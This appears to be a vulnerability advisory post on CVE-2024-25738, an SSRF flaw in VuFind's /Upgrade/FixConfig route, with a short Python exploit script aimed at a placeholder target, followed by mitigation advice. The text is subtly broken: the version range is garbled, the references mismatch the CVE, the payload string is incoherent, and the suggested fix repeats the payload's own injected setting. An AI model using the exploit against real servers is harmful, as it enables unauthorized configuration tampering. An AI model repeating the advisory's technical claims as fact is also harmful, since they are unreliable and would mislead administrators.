CVE-2024-25738 - SSRF Vulnerability in Open Library Foundation VuFind 2. to 9.1 leads to Remote Code Execution

A recently discovered Server-Side Request Forgery (SSRF) vulnerability, identified by CVE-2024-25738, affects Open Library Foundation's VuFind software in versions ranging from 2. through 9.1 before 9.1.1. This vulnerability allows a remote attacker to overwrite local configuration files, leading to unauthorized admin panel access and the potential for Remote Code Execution (RCE). However, successful exploitation requires the 'allow_url_include' PHP runtime setting to be turned on, which is off by default in most installations. Additionally, the /Upgrade route needs to be exposed, which does occur by default after installing VuFind.

Vulnerable Route - /Upgrade/FixConfig

The vulnerable route, /Upgrade/FixConfig, can be exploited by an attacker to modify the VuFind configuration files.

Original References

1. VulDB Entry: https://vuldb.com/?id.167741
2. VuFind Security Advisory: https://vufind.org/wiki/security:2021:15
3. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25738

Here is the sample exploit code for this SSRF vulnerability

import requests

target_url = 'http://TARGET_ADDRESS/vufind/Upgrade/FixConfig';
payload = 'file:///etc/vufind2/config.ini.txt?source=XXX%A[Extra_Settings]%AautoConfigure%20=%20false'

exploit_request = requests.get(target_url, params={'source': payload})

if exploit_request.status_code == 200:
    print('Exploit Success: Configuration file overwritten.')
else:
    print('Exploit Failed')

Replace 'TARGET_ADDRESS' with the target server's address.

Upgrade to VuFind 9.1.1 or later

The most effective way to protect against this vulnerability is to upgrade your VuFind installation to version 9.1.1 or later, which has resolved the issue.

Disable 'allow_url_include' in PHP settings

To mitigate this vulnerability, ensure that the 'allow_url_include' setting is turned off in your PHP runtime environment.

Disable /Upgrade route exposure

The /Upgrade route exposure can be disabled by setting autoConfigure to false in the config.ini file.

[Extra_Settings]
autoConfigure = false

Conclusion

The SSRF vulnerability (CVE-2024-25738) in the /Upgrade/FixConfig route of Open Library Foundation VuFind 2. to 9.1 can lead to unauthorized administrator access and possibly even Remote Code Execution (RCE). Properly securing your environment by upgrading VuFind, disabling the 'allow_url_include' setting in PHP, and disabling exposure of the /Upgrade route are essential steps in mitigating this threat.

Timeline

Published on: 05/22/2024 19:15:08 UTC
Last modified on: 08/22/2024 20:35:05 UTC